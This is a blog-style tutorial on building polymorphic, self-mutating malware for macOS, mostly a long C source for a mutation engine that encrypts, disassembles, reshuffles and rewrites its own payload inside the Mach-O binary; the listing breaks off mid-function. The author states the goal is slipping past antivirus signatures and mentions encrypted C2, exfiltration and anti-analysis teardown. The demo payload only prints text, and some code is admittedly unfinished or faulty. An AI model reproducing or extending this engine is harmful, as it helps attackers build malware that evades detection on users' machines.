Today’s about writing fully custom malware targeting macOS. This is a cut into the world of polymorphic malware this time on macOS. We’re talking raw Mach-O internals, low-level APIs, and what it really takes to slip past Apple’s security stack.
macOS malware is fun, not the lame “steal your cat pics” kind, but the “how far can we contort a Mach-O before SIP loses its mind” kind. If you know me, you know I’ve got a soft spot for self-modifying code. Still doesn’t work half the time (yeah, yeah skill issue).
This piece covers some known techniques and isn’t here to hand you malware, so don’t get it twisted. There’s nothing fancy or groundbreaking just the basics anyone with some free time and bad ideas can mess around with.
As usual, I’ll lay out the mechanics first, theory, intent, then implementation. Fileless execution, runtime mutation, anti-debug, and pure native API surface. This isn’t for people looking to copy-paste and feel clever. It’s for those who want to understand how things work.
Some familiarity with malware development is expected. I don’t care if you’re on Linux or Windows techniques may vary, but the core concepts stay the same: debugging and working low-level. If you’re new to macOS, check out the first article for the basics; it’ll get you ready for what’s coming.
References:
Overview
In the first paper I put out, I kept things simple, used a stub to demo mutation without going deep into the engine itself. It was basic, close to the metal, and I didn’t want to overload the writeup. But on second thought? Fuck it, Let me introduce a polymorphic generation engine for x86-64, built on old tricks, but tuned for macOS x86-64 architecture. This isn’t Aether. Totally separate. Just an example I’ll be using throughout, don’t mix the two up.
All of it was tested on macOS 14+ (Sonoma). No promises it’ll run clean everywherem, your mileage may vary. If there’s a better source for something, I’ll link it. And if you’re done with the preamble. The code’s big, too much to unpack all at once. It’s the kind of code you just keep writing, every time an idea hits, you slap it in. Before you know it, you’ve got 3000+ lines.
If you want to dig through it yourself, grab it here. It’s raw, incomplete, and needs work to actually run. Some parts were left unfinished on purpose. And if something feels off, that’s not a mistake, Each architecture gets its own full instruction decoder, analyzer, and mutation engine, no shared logic, no shortcuts.
- Aether – a lightweight to mess with.
- x86-64 (Intel/AMD processors)
- ARM64 (Apple Silicon M1/M2/M3) - pretty basic.
At the center is the Mut8 engine a control-flow-aware morphed for both x86 and ARM64. It deconstructs and rebuilds itself mid-execution, saved logic while breaking signature-based assumptions. Then we turn to Mach-O internals: section injection in dead space, live patching, and relocations that treat memory layout as a suggestion. The binary redefines itself while it runs.
Beyond that, it’s a sandbox of sysctl edge cases, manual symbol resolution, and panic switches that incinerate the implant if things smell wrong. Encrypted C2, selective data exfiltration, and full teardown routines that erase both presence and origin. It’s designed to be annoying to analyze, difficult to persist in memory, and damn near impossible to pin down statically.
macOS isn’t immune. It isn’t malware-proof. If you know where to dig, the system hands you the tools, buried under layers of “security” that assume you won’t dig this deep.
This whole project came out of too many wasted hours reversing macOS malware and asking: how would I build this better? All the code here is just stubs, designed to keep things simple and highlight each technique as we go.
THE ARCHITECTURE
Self-mutating code dynamically modifies itself at runtime. This macOS implementation leans on the Mach-O format and system APIs, using a custom section in the __DATA
segment to store and evolve the payload. The architecture breaks into two distinct phases:
Parent Process
Role: Initialization, decryption, mutation, re-encryption, and self-saving.
Flow:
– Generates fresh keys
– Decrypts the payload
– Mutates (instruction swapping, junk insertion)
– Re-encrypts and saves the updated code
Mutant Process
Role: Executes the evolved payload.
Flow:
– Retrieves updated code from Parent
– Executes the modified payload
– Continues the mutation cycle after triggers are hit
Core Idea:
The malware encrypts its own payload, decrypts and mutates it at runtime - a basic form of polymorphism. But don’t get ahead of yourself. We’ll break down the mutation engine, how it ticks internally, and the tricks it uses to stay persistent.
╔═════════════════════════════════════════════════════════════╗
║ INITIAL DESIGN ║
╠═════════════════════════════════════════════════════════════╣
║ 1. Validate Execution Environment ║
║ ├─ If running outside /tmp (~/Downloads): ║
║ │ └─ Copy self to /tmp and exec the copy ║
║ └─ Else: ║
║ └─ Self-destruct ║
║ ║
║ 2. Read encrypted payload and header from __DATA section ║
║ 3. Payload ║
║ ├─ If first run: ║
║ │ └─ Initialize payload (NOPs + payload), encrypt it, ║
║ │ update header (count = 1) ║
║ └─ Else: ║
║ ├─ Decrypt payload ║
║ ├─ Verify payload integrity (SHA‑256 hash) ║
║ ├─ Mutate payload (via disassembly-based mutation) ║
║ ├─ Generate new AES keys/IVs and re–encrypt payload ║
║ └─ Write updated header and payload back to binary ║
║ ║
║ 4. Load the decrypted payload ║
║ 5. Execute the payload (performs its task then ...) ║
║ 6. Mutation Cycle: ║
║ - On next run, the mutation cycle repeats or die ║
╚═════════════════════════════════════════════════════════════╝
First, let’s break down what Signatures actually are. A signature is just a byte pattern antivirus software uses to flag malicious files. It could be a string, a small piece of code, a hash anything that helps it hunt bad files. To dodge this, encryption gets layered in so antivirus can’t match known signatures.
Then there’s the Payload the actual file hidden behind the encryption. It doesn’t live on its own; it’s stuck onto the Stub somehow. Maybe it’s embedded as a resource, slapped onto the end of a file, or tucked inside a new or existing section (we’ll get into that soon).
The Stub is a tiny piece with one job: decrypt the payload and fire it in memory. Since the payload’s encrypted, antivirus can’t hit it directly so it goes after the stub instead. But the stub’s so simple it’s easy to tweak, letting it slide past detection again and again.
So, what’s the move? A few ways you can play it.
On one hand, you could stay minimal: a self-modifying loader that’s small, fast to write, and easy to maintain. It would pull off modest mutations a couple quick changes here and there, enough to slip by without much noise. Upside? Your code stays lean, ugly, and yours.
“What starts as polymorphic finishes as metamorphic.”
On the flip side, you could go full metamorphic. Here, the loader doesn’t just tweak itself, it tears itself apart and rebuilds from scratch. New layout, fresh instruction flow, changed encryption every time it breathes. Even if a reverse engineer or scanner grabs one copy, the next generation’s a stranger.
See:
Of course, this comes with its own mess. Making sure each transformation doesn’t wreck functionality is a whole problem on its own. You need heuristics things like checking instruction counts, validating branches, and sanity-checking changes just to make sure the thing doesn’t crash and burn.
This piece isn’t fully about mutation, but since it’s stitched into the design, here’s a small taste to get your hands dirty. It’s close to how our engine works (not giving away everything full thing’s on GitHub), but this snippet should give you the general idea.
Just know it’s half-baked.
“This is bad coding.”
mutator.c
/* 0x00s: Entry inc */
#include <stdio.h> // stdio
#include <stdlib.h> // mem alloc, exit
#include <fcntl.h>
#include <unistd.h> // read/write ops
#include <string.h>
#include <sys/random.h> // getentropy
#include <sys/mman.h> // mmap, mprotect
#include <sys/stat.h>
#include <sys/types.h>
#include <stdint.h>
#include <errno.h>
#include <signal.h>
#include <stdbool.h>
#include <time.h>
#include <mach-o/dyld.h> // _NSGetExecutablePath
#include <mach-o/getsect.h> // extract sect data
#include <mach-o/loader.h> // Mach-O defs
#include <capstone/capstone.h> // disasm
#include <CommonCrypto/CommonCryptor.h> // AES
#include <CommonCrypto/CommonDigest.h> // SHA256
/* Macros */
#define K 32 // AES key len
#define S 30 // Stub offset in payload
#define J 16 // Max junk size
#define P 4096 // Payload size/page size
/* Structs */
typedef struct __attribute__((packed)) {
uint8_t key[K]; // AES key
uint8_t iv[kCCBlockSizeAES128]; // AES IV
uint64_t seed; // RNG seed
uint32_t count; // Mutation counter
uint8_t hash[CC_SHA256_DIGEST_LENGTH]; // SHA256 checksum
} Encryption;
typedef struct {
uint8_t key[K]; // PRNG key
uint8_t iv[12]; // PRNG IV
uint8_t stream[64]; // Output block
size_t position; // Stream offset
uint64_t counter; // Block counter
} ChaCha;
typedef struct {
csh handle; // Capstone handle
cs_insn *insns; // Disasm buffer
size_t count; // Instr count
uint8_t *original; // Orig code ptr
size_t size; // Code size
ChaCha rng; // Mutation RNG state
} Evolution;
/* Provided by linker */
extern struct mach_header_64 _mh_execute_header;
/* Data section: holds encryption header + payload.
__attribute__((used)) prevents stripping. */
__attribute__((used, section("__DATA,__fdata"))) static uint8_t data[sizeof(Encryption) + P];
// https://developer.apple.com/library/archive/documentation/Performance/Conceptual/CodeFootprint/Articles/MachOOverview.html
/* Arch config */
// https://github.com/capstone-engine/capstone
#if defined(__x86_64__)
#define ARCH_X86 1
#define ARC CS_ARCH_X86
#define MODE CS_MODE_64
#include <capstone/x86.h> // x86 defs
#elif defined(__arm64__)
#define ARCH_ARM 1
#define ARC CS_ARCH_ARM64
#define MODE 0
#include <capstone/arm64.h> // ARM64 defs
#else
#error "Unsupported arch"
#endif
/* Dummy payload: prints "Hello World" */
const uint8_t dummy[] = {
#ifdef ARCH_X86
0xeb, 0x1e, // jmp to payload
0x5e, // pop rsi
0xb8, 0x04, 0x00, 0x00, 0x02, // mov eax, 4
0xbf, 0x01, 0x00, 0x00, 0x00, // mov edi, 1
0xba, 0x0e, 0x00, 0x00, 0x00, // mov edx, 0x0e
0x0f, 0x05, // syscall (write)
0xb8, 0x01, 0x00, 0x00, 0x02, // mov eax, 1
0xbf, 0x00, 0x00, 0x00, 0x00, // mov edi, 0
0x0f, 0x05, // syscall (exit)
0xe8, 0xdd, 0xff, 0xff, 0xff, // call jmp target
0x48, 0x65, 0x6c, 0x6c, 0x6f, 0x20, 0x57, 0x6f,
0x72, 0x6c, 0x64, 0x21, 0x0d, 0x0a // "Hello World!\r\n"
#elif defined(ARCH_ARM)
0x00, 0x80, 0x20, 0xd1, // sub sp, sp, #0x20
0x02, 0x00, 0x00, 0x90, // adrp x2, 0
0x22, 0x40, 0x00, 0xf9, // str x2, [sp]
0x20, 0x00, 0x80, 0x52, // mov w0, #1
0x21, 0x00, 0x80, 0x52, // mov w1, #1
0x40, 0x00, 0x80, 0x52, // mov w2, #14
0x00, 0x00, 0x00, 0x4d, // mov x16, #0x2000004
0x00, 0x00, 0x00, 0x01, // svc 0
0x20, 0x00, 0x80, 0x52, // mov w0, #1
0x00, 0x00, 0x00, 0x4d, // mov x16, #0x2000001
0x00, 0x00, 0x00, 0x01, // svc 0
0x00, 0x02, 0x1f, 0x61, // br #0x40
0x48, 0x65, 0x6c, 0x6c, 0x6f, 0x20, 0x57, 0x6f,
0x72, 0x6c, 0x64, 0x21, 0x0d, 0x0a // "Hello World!\r\n"
#endif
};
const size_t len = sizeof(dummy); // payload len
/* ChaCha20 macros */
// Why AES and ChaCha20? Overkill maybe? Who know's.
// https://github.com/aead/chacha20
#define ROTL32(x, n) (((x) << (n)) | ((x) >> (32 - (n))))
#define QR(a, b, c, d) (a += b, d ^= a, d = ROTL32(d, 16), c += d, b ^= c, b = ROTL32(b, 12), \
a += b, d ^= a, d = ROTL32(d, 8), c += d, b ^= c, b = ROTL32(b, 7))
/* ChaCha20 block generator */
void chacha20_block(const uint32_t key[8], uint32_t counter, const uint32_t nonce[3], uint32_t out[16]) {
uint32_t state[16], orig[16], c[4] = {0x61707865, 0x3320646e, 0x79622d32, 0x6B206574};
state[0] = c[0]; state[1] = c[1]; state[2] = c[2]; state[3] = c[3];
memcpy(&state[4], key, 32); // load key
state[12] = counter;
memcpy(&state[13], nonce, 12); // load nonce
memcpy(orig, state, sizeof(state));
for (int i = 0; i < 10; i++) {
QR(state[0], state[4], state[8], state[12]);
QR(state[1], state[5], state[9], state[13]);
QR(state[2], state[6], state[10], state[14]);
QR(state[3], state[7], state[11], state[15]);
QR(state[0], state[5], state[10], state[15]);
QR(state[1], state[6], state[11], state[12]);
QR(state[2], state[7], state[8], state[13]);
QR(state[3], state[4], state[9], state[14]);
}
for (int i = 0; i < 16; i++)
out[i] = state[i] + orig[i];
}
/* Return 32-bit PRNG value */
uint32_t chacha20_random(ChaCha *rng) {
if (rng->position >= 64) {
uint32_t key[8], nonce[3];
memcpy(key, rng->key, 32);
memcpy(nonce, rng->iv, 12);
chacha20_block(key, (uint32_t)rng->counter, nonce, (uint32_t *)rng->stream);
rng->counter++;
rng->position = 0;
}
uint32_t v;
memcpy(&v, rng->stream + rng->position, sizeof(v));
rng->position += sizeof(v);
return v;
}
/* Initialize ChaCha state using seed hash */
void chacha20_init(ChaCha *rng, const uint8_t *seed, size_t len) {
uint8_t hash[CC_SHA256_DIGEST_LENGTH];
CC_SHA256(seed, (CC_LONG)len, hash);
memcpy(rng->key, hash, K);
uint8_t ivh[CC_SHA256_DIGEST_LENGTH];
CC_SHA256(hash, CC_SHA256_DIGEST_LENGTH, ivh);
memcpy(rng->iv, ivh, 12);
rng->position = 64;
rng->counter = ((uint64_t)time(NULL)) ^ getpid();
}
/* Check if branch target is valid */
bool branch(uint64_t t) {
#ifdef ARCH_X86
const uintptr_t START = 0x1000;
return (t >= START && t < (START + P));
#elif defined(ARCH_ARM)
const uintptr_t START = 0x10000;
return (t >= START && t < (START + P));
#else
return true;
#endif
}
/* Validate disassembled instruction */
bool verify(csh h, const cs_insn *i) {
if (!i) return false;
#ifdef ARCH_X86
cs_detail *d = i->detail;
if (!d) return false;
for (size_t j = 0; j < d->groups_count; j++) {
if (d->groups[j] == CS_GRP_PRIVILEGE) { // https://www.felixcloutier.com/x86/cli
fprintf(stderr, "(%s) rejected\n", i->mnemonic);
return false;
}
}
if ((i->id == X86_INS_JMP || i->id == X86_INS_CALL ||
i->id == X86_INS_JE || i->id == X86_INS_JNE ||
i->id == X86_INS_LOOP) &&
(d->x86.op_count > 0 && d->x86.operands[0].type == X86_OP_IMM)) {
if (!branch(d->x86.operands[0].imm)) {
fprintf(stderr, "Branch 0x%llx out\n", d->x86.operands[0].imm);
return false;
}
}
#elif defined(ARCH_ARM)
cs_detail *d = i->detail;
if (!d) return false;
for (size_t j = 0; j < d->groups_count; j++) {
if (d->groups[j] == CS_GRP_PRIVILEGE) {
fprintf(stderr, "(%s) rejected\n", i->mnemonic);
return false;
}
}
if ((i->id == ARM64_INS_B || i->id == ARM64_INS_BL ||
i->id == ARM64_INS_CBZ || i->id == ARM64_INS_CBNZ ||
i->id == ARM64_INS_TBB || i->id == ARM64_INS_TBZ) &&
(d->arm64.op_count > 0 && d->arm64.operands[0].type == ARM64_OP_IMM)) {
if (!branch(d->arm64.operands[0].imm)) {
fprintf(stderr, "Branch 0x%llx out\n", d->arm64.operands[0].imm);
return false;
}
}
#endif
return true;
}
/* Disassemble & validate code block */
bool ratify(csh h, const uint8_t *code, size_t len) {
cs_insn *i = NULL;
bool valid = true;
cs_option(h, CS_OPT_DETAIL, CS_OPT_ON);
size_t cnt = cs_disasm(h, code, len, 0, 1, &i);
if (cnt != 1) {
fprintf(stderr, "Disasm fail for bytes:");
for (size_t k = 0; k < len; k++) fprintf(stderr, " %02x", code[k]);
fprintf(stderr, "\n");
valid = false;
goto cleanup;
}
if (i[0].size != len) {
fprintf(stderr, "Expected %zu, got %u bytes\n", len, i[0].size);
valid = false;
goto cleanup;
}
if (!verify(h, i)) {
valid = false;
goto cleanup;
}
cleanup:
if (i) cs_free(i, 1);
return valid;
}
/* Mutation ptr */
typedef void (*Morph)(uint8_t *code, size_t sz, ChaCha *rng);
/* Swap two instructions of equal size */
void swap(uint8_t *code, size_t sz, ChaCha *rng) {
#ifdef ARCH_X86
Evolution ctx = {0};
ctx.original = code;
ctx.size = sz;
ctx.rng = *rng;
if (cs_open(CS_ARCH_X86, CS_MODE_64, &ctx.handle) != CS_ERR_OK) return;
ctx.count = cs_disasm(ctx.handle, code, sz, (uintptr_t)code, 0, &ctx.insns);
if (!ctx.count) { cs_close(&ctx.handle); return; }
if (ctx.count < 2) { cs_free(ctx.insns, ctx.count); cs_close(&ctx.handle); return; }
size_t i = chacha20_random(rng) % ctx.count;
size_t j = chacha20_random(rng) % ctx.count;
if (i == j || ctx.insns[i].size != ctx.insns[j].size) {
cs_free(ctx.insns, ctx.count);
cs_close(&ctx.handle);
return;
}
size_t off_i = ctx.insns[i].address - (uintptr_t)code;
size_t off_j = ctx.insns[j].address - (uintptr_t)code;
size_t insz = ctx.insns[i].size;
if (off_i + insz > sz || off_j + insz > sz) {
cs_free(ctx.insns, ctx.count);
cs_close(&ctx.handle);
return;
}
uint8_t temp_i[32], temp_j[32];
memcpy(temp_i, code + off_i, insz);
memcpy(temp_j, code + off_j, insz);
memcpy(code + off_i, temp_j, insz);
memcpy(code + off_j, temp_i, insz);
if (!ratify(ctx.handle, code + off_i, insz) ||
!ratify(ctx.handle, code + off_j, insz)) {
memcpy(code + off_i, temp_i, insz);
memcpy(code + off_j, temp_j, insz);
}
if (ctx.insns) cs_free(ctx.insns, ctx.count);
cs_close(&ctx.handle);
#elif defined(ARCH_ARM)
Evolution ctx = {0};
ctx.original = code;
ctx.size = sz;
ctx.rng = *rng;
if (cs_open(CS_ARCH_ARM64, 0, &ctx.handle) != CS_ERR_OK) return;
ctx.count = cs_disasm(ctx.handle, code, sz, (uintptr_t)code, 0, &ctx.insns);
if (!ctx.count) { cs_close(&ctx.handle); return; }
if (ctx.count < 2) { cs_free(ctx.insns, ctx.count); cs_close(&ctx.handle); return; }
size_t i = chacha20_random(rng) % ctx.count;
size_t j = chacha20_random(rng) % ctx.count;
if (i == j || ctx.insns[i].size != ctx.insns[j].size) {
cs_free(ctx.insns, ctx.count);
cs_close(&ctx.handle);
return;
}
size_t off_i = ctx.insns[i].address - (uintptr_t)code;
size_t off_j = ctx.insns[j].address - (uintptr_t)code;
size_t insz = ctx.insns[i].size;
if (off_i + insz > sz || off_j + insz > sz) {
cs_free(ctx.insns, ctx.count);
cs_close(&ctx.handle);
return;
}
uint8_t temp_i[32], temp_j[32];
memcpy(temp_i, code + off_i, insz);
memcpy(temp_j, code + off_j, insz);
memcpy(code + off_i, temp_j, insz);
memcpy(code + off_j, temp_i, insz);
if (!ratify(ctx.handle, code + off_i, insz) ||
!ratify(ctx.handle, code + off_j, insz)) {
memcpy(code + off_i, temp_i, insz);
memcpy(code + off_j, temp_j, insz);
}
if (ctx.insns) cs_free(ctx.insns, ctx.count);
cs_close(&ctx.handle);
#endif
}
/* Insert junk opcodes at random spot */
void trash(uint8_t *code, size_t sz, ChaCha *rng) {
#ifdef ARCH_X86
if (sz >= J) {
size_t pos = chacha20_random(rng) % (sz - J);
uint32_t choice = chacha20_random(rng) % 4;
size_t len = 0;
switch (choice) {
case 0: {
if (sz - pos < 8) break;
uint8_t seq[8] = {0x48, 0x83, 0xC0, 0x01, 0x48, 0x83, 0xE8, 0x01};
memcpy(code + pos, seq, 8);
len = 8;
} break;
case 1: {
if (sz - pos < 2) break;
uint8_t seq[2] = {0x50, 0x58};
memcpy(code + pos, seq, 2);
len = 2;
} break;
case 2: {
if (sz - pos < 10) break;
uint32_t imm = chacha20_random(rng);
uint8_t seq[10];
seq[0] = 0xB8;
memcpy(seq + 1, &imm, 4);
seq[5] = 0x35;
memcpy(seq + 6, &imm, 4);
memcpy(code + pos, seq, 10);
len = 10;
} break;
case 3: {
if (sz - pos < 3) break;
uint8_t seq[3] = {0x48, 0x31, 0xC0};
memcpy(code + pos, seq, 3);
len = 3;
} break;
default:
break;
}
if (len > 0) {
Evolution ctx = {0};
ctx.original = code;
ctx.size = sz;
ctx.rng = *rng;
if (cs_open(ARC, MODE, &ctx.handle) != CS_ERR_OK) return;
if (!ratify(ctx.handle, code + pos, len)) {
memset(code + pos, 0x90, len);
}
cs_close(&ctx.handle);
}
}
#elif defined(ARCH_ARM)
if (sz >= J) {
size_t pos = chacha20_random(rng) % (sz - J);
uint32_t choice = chacha20_random(rng) % 4;
size_t len = 0;
switch (choice) {
case 0: {
if (sz - pos < 4) break;
uint8_t seq[4] = {0x00, 0x00, 0x80, 0xd2};
memcpy(code + pos, seq, 4);
len = 4;
} break;
case 1: {
if (sz - pos < 4) break;
uint8_t seq[4] = {0x00, 0x00, 0x80, 0x12};
memcpy(code + pos, seq, 4);
len = 4;
} break;
case 2: {
if (sz - pos < 8) break;
uint32_t imm = chacha20_random(rng);
uint8_t seq[8];
seq[0] = 0x00;
seq[1] = 0x00;
seq[2] = 0x80;
seq[3] = 0xd2;
memcpy(seq + 4, &imm, 4);
memcpy(code + pos, seq, 8);
len = 8;
} break;
case 3: {
if (sz - pos < 4) break;
uint8_t seq[4] = {0x00, 0x20, 0x80, 0xd2};
memcpy(code + pos, seq, 4);
len = 4;
} break;
default:
break;
}
if (len > 0) {
Evolution ctx = {0};
ctx.original = code;
ctx.size = sz;
ctx.rng = *rng;
if (cs_open(ARC, MODE, &ctx.handle) != CS_ERR_OK) return;
if (!ratify(ctx.handle, code + pos, len)) {
memset(code + pos, 0x90, len);
}
cs_close(&ctx.handle);
}
}
#endif
}
/* Insert opaque: very simple, I recommend a disassembler to understand. */
void Opaque(uint8_t *code, size_t sz, ChaCha *rng) {
#ifdef ARCH_X86
if (sz < 12) return;
uint32_t imm = chacha20_random(rng);
uint8_t seq[12];
seq[0] = 0xB8;
memcpy(seq + 1, &imm, 4);
seq[5] = 0x3D;
memcpy(seq + 6, &imm, 4);
seq[10] = 0x74;
seq[11] = 0x00;
size_t pos = chacha20_random(rng) % (sz - 12);
memcpy(code + pos, seq, 12);
Evolution ctx = {0};
ctx.original = code;
ctx.size = sz;
ctx.rng = *rng;
if (cs_open(ARC, MODE, &ctx.handle) != CS_ERR_OK) return;
if (!ratify(ctx.handle, code + pos, 12)) {
memset(code + pos, 0x90, 12);
}
cs_close(&ctx.handle);
#elif defined(ARCH_ARM)
if (sz < 12) return;
uint32_t imm = chacha20_random(rng);
uint8_t seq[12];
seq[0] = 0x00;
seq[1] = 0x00;
seq[2] = 0x80;
seq[3] = 0x52;
memcpy(seq + 4, &imm, 4);
seq[8] = 0x00;
seq[9] = 0x00;
seq[10] = 0x80;
seq[11] = 0x72;
size_t pos = chacha20_random(rng) % (sz - 12);
memcpy(code + pos, seq, 12);
Evolution ctx = {0};
ctx.original = code;
ctx.size = sz;
ctx.rng = *rng;
if (cs_open(ARC, MODE, &ctx.handle) != CS_ERR_OK) return;
if (!ratify(ctx.handle, code + pos, 12)) {
memset(code + pos, 0x90, 12);
}
cs_close(&ctx.handle);
#endif
}
/* Replace an instruction with NOPs */
void nopOut(uint8_t *code, size_t sz, ChaCha *rng) {
#ifdef ARCH_X86
Evolution ctx = {0};
ctx.original = code;
ctx.size = sz;
ctx.rng = *rng;
if (cs_open(CS_ARCH_X86, CS_MODE_64, &ctx.handle) != CS_ERR_OK) return;
ctx.count = cs_disasm(ctx.handle, code, sz, (uintptr_t)code, 0, &ctx.insns);
if (!ctx.count) { cs_close(&ctx.handle); return; }
size_t i = chacha20_random(rng) % ctx.count;
size_t off = ctx.insns[i].address - (uintptr_t)code;
size_t insz = ctx.insns[i].size;
if (off + insz > sz) { cs_free(ctx.insns, ctx.count); cs_close(&ctx.handle); return; }
uint8_t bak[32];
memcpy(bak, code + off, insz);
if (insz >= 1 && insz <= 10) {
static const uint8_t nop_sequences[][10] = {
{0x90},
{0x66, 0x90},
{0x0F, 0x1F, 0x00},
{0x0F, 0x1F, 0x40, 0x00},
{0x0F, 0x1F, 0x44, 0x00, 0x00},
{0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00},
{0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00},
{0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00},
{0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00},
{0x0F, 0x1F, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
};
memcpy(code + off, nop_sequences[insz - 1], insz);
} else {
memset(code + off, 0x90, insz);
}
if (!ratify(ctx.handle, code + off, insz)) {
memcpy(code + off, bak, insz);
}
if (ctx.insns) cs_free(ctx.insns, ctx.count);
cs_close(&ctx.handle);
#elif defined(ARCH_ARM)
Evolution ctx = {0};
ctx.original = code;
ctx.size = sz;
ctx.rng = *rng;
if (cs_open(CS_ARCH_ARM64, 0, &ctx.handle) != CS_ERR_OK) return;
ctx.count = cs_disasm(ctx.handle, code, sz, (uintptr_t)code, 0, &ctx.insns);
if (!ctx.count) { cs_close(&ctx.handle); return; }
size_t i = chacha20_random(rng) % ctx.count;
size_t off = ctx.insns[i].address - (uintptr_t)code;
size_t insz = ctx.insns[i].size;
if (off + insz > sz) { cs_free(ctx.insns, ctx.count); cs_close(&ctx.handle); return; }
uint8_t bak[32];
memcpy(bak, code + off, insz);
if (insz >= 1 && insz <= 4) {
static const uint8_t nop_sequences[][4] = {
{0x1f, 0x20, 0x03, 0xd5},
{0x1f, 0x20, 0x03, 0xd5},
{0x1f, 0x20, 0x03, 0xd5},
{0x1f, 0x20, 0x03, 0xd5}
};
memcpy(code + off, nop_sequences[insz - 1], insz);
} else {
memset(code + off, 0x1f, insz);
}
if (!ratify(ctx.handle, code + off, insz)) {
memcpy(code + off, bak, insz);
}
if (ctx.insns) cs_free(ctx.insns, ctx.count);
cs_close(&ctx.handle);
#endif
}
// str
Morph engine[] = {
swap,
trash,
Opaque,
nopOut
};
/* Mutation routine: apply multiple passes and revert if too degraded */
void mutate(uint8_t *code, size_t sz, ChaCha *rng) {
Evolution ctx = {0};
ctx.original = code;
ctx.size = sz;
ctx.rng = *rng;
#if defined(ARCH_X86)
if (cs_open(CS_ARCH_X86, CS_MODE_64, &ctx.handle) != CS_ERR_OK) return;
#elif defined(ARCH_ARM)
if (cs_open(CS_ARCH_ARM64, 0, &ctx.handle) != CS_ERR_OK) return;
#endif
ctx.count = cs_disasm(ctx.handle, code, sz, (uintptr_t)code, 0, &ctx.insns);
if (!ctx.count) { cs_close(&ctx.handle); return; }
uint8_t *backup = malloc(sz);
if (!backup) { cs_free(ctx.insns, ctx.count); cs_close(&ctx.handle); return; }
memcpy(backup, code, sz);
size_t original_count = ctx.count;
for (int pass = 0; pass < 3; pass++) {
Morph strategy = engine[chacha20_random(&ctx.rng) % (sizeof(engine) / sizeof(engine[0]))];
strategy(code, sz, &ctx.rng);
}
cs_insn *final = NULL;
size_t final_count = cs_disasm(ctx.handle, code, sz, (uintptr_t)code, 0, &final);
if (final_count < (original_count * 0.9)) {
memcpy(code, backup, sz);
}
free(backup);
if (ctx.insns) cs_free(ctx.insns, ctx.count);
if (final) cs_free(final, final_count);
cs_close(&ctx.handle);
*rng = ctx.rng;
}
/* Mutate payload region, skipping stub */
void mutate_payload(uint8_t *code, size_t sz, ChaCha *rng) {
if (sz <= S) return;
uint8_t *target = code + S;
size_t target_size = sz - S;
#ifdef MU
mutate(target, target_size, rng);
#else
// No mutation: MU flag off.
#endif
}
/* Volatile memcpy to defeat optimizations */
void _memcpy(void *dst, const void *src, size_t len) {
volatile uint8_t *d = dst;
const volatile uint8_t *s = src;
while (len--) *d++ = *s++;
}
/* Volatile zeroing */
void zer(void *p, size_t len) {
volatile uint8_t *x = p;
while (len--) *x++ = 0;
}
/* AES encrypt/decrypt wrapper */
void crypt_payload(int enc, const uint8_t *key, const uint8_t *iv,
const uint8_t *in, uint8_t *out, size_t len) {
CCCryptorRef cr;
CCCryptorStatus st = CCCryptorCreate(enc ? kCCEncrypt : kCCDecrypt,
kCCAlgorithmAES, 0, key, K, iv, &cr);
if (st != kCCSuccess) return;
size_t moved = 0;
if (CCCryptorUpdate(cr, in, len, out, len, &moved) != kCCSuccess) {
CCCryptorRelease(cr);
return;
}
size_t fin = 0;
CCCryptorFinal(cr, out + moved, len - moved, &fin);
CCCryptorRelease(cr);
}
#define cipher(k, iv, in, out, len) crypt_payload(1, k, iv, in, out, len)
#define decipher(k, iv, in, out, len) crypt_payload(0, k, iv, in, out, len)
/* Write back modified __fdata section */
void save(uint8_t *data, size_t sz) {
// https://developer.apple.com/documentation/foundation/nsbundle/1409078-executablepath
char path[1024];
uint32_t ps = sizeof(path);
if (_NSGetExecutablePath(path, &ps) != 0) return;
int fd = open(path, O_RDWR);
if (fd < 0) { perror("open"); return; }
struct mach_header_64 *h = &_mh_execute_header; // https://developer.apple.com/documentation/kernel/mach_header_64
uint64_t off = 0;
struct load_command *lc = (struct load_command *)((char *)h + sizeof(*h));
for (uint32_t i = 0; i < h->ncmds; i++) {
if (lc->cmd == LC_SEGMENT_64) {
struct segment_command_64 *seg = (struct segment_command_64 *)lc; // https://developer.apple.com/documentation/kernel/segment_command_64
struct section_64 *sec = (struct section_64 *)((char *)seg + sizeof(*seg));
for (uint32_t j = 0; j < seg->nsects; j++) {
if (!strcmp(sec[j].sectname, "__fdata") &&
!strcmp(sec[j].segname, "__DATA")) {
off = sec[j].offset;
size_t section_size = sec[j].size;
if (sz > section_size) {
fprintf(stderr, "Got %zu bytes, only %llu available\n", sz, section_size);
close(fd);
return;
}
break;
}
}
}
lc = (struct load_command *)((char *)lc + lc->cmdsize); // https://developer.apple.com/documentation/kernel/load_command/
}
if (off == 0) { fprintf(stderr, "Section not found\n"); close(fd); return; }
if (lseek(fd, off, SEEK_SET) == -1) { perror("lseek"); close(fd); return; }
size_t tot = 0;
while (tot < sz) {
ssize_t w = write(fd, data + tot, sz - tot);
if (w <= 0) { perror("write"); break; }
tot += w;
}
if (tot != sz) fprintf(stderr, "Incomplete write\n");
close(fd);
}
/* Check for privileged ops */
bool check_priv(uint8_t *code, size_t sz) {
csh h;
cs_insn *ins = NULL;
bool priv = false;
if (cs_open(ARC, MODE, &h) != CS_ERR_OK) {
fprintf(stderr, "Capstone fail\n");
return true;
}
cs_option(h, CS_OPT_DETAIL, CS_OPT_ON);
size_t cnt = cs_disasm(h, code, sz, (uintptr_t)code, 0, &ins);
if (cnt > 0) {
for (size_t i = 0; i < cnt; i++) {
#ifdef ARCH_X86
cs_detail *d = ins[i].detail;
for (size_t j = 0; j < d->groups_count; j++) {
if (d->groups[j] == CS_GRP_PRIVILEGE) {
fprintf(stderr, "Priv op: %s %s\n", ins[i].mnemonic, ins[i].op_str);
priv = true;
break;
}
}
#elif defined(ARCH_ARM)
cs_detail *d = ins[i].detail;
for (size_t j = 0; j < d->groups_count; j++) {
if (d->groups[j] == CS_GRP_PRIVILEGE) {
fprintf(stderr, "Priv op: %s %s\n", ins[i].mnemonic, ins[i].op_str);
priv = true;
break;
}
}
#endif
if (priv) break;
}
} else { fprintf(stderr, "Disasm fail\n"); priv = true; }
cs_free(ins, cnt);
cs_close(&h);
return priv;
}
/* Make code executable and jump */
void execute(uint8_t *code, size_t sz) {
long ps = sysconf(_SC_PAGESIZE);
if (ps <= 0) { perror("sysconf"); return; }
uintptr_t addr = (uintptr_t)code, start = addr & ~(ps - 1);
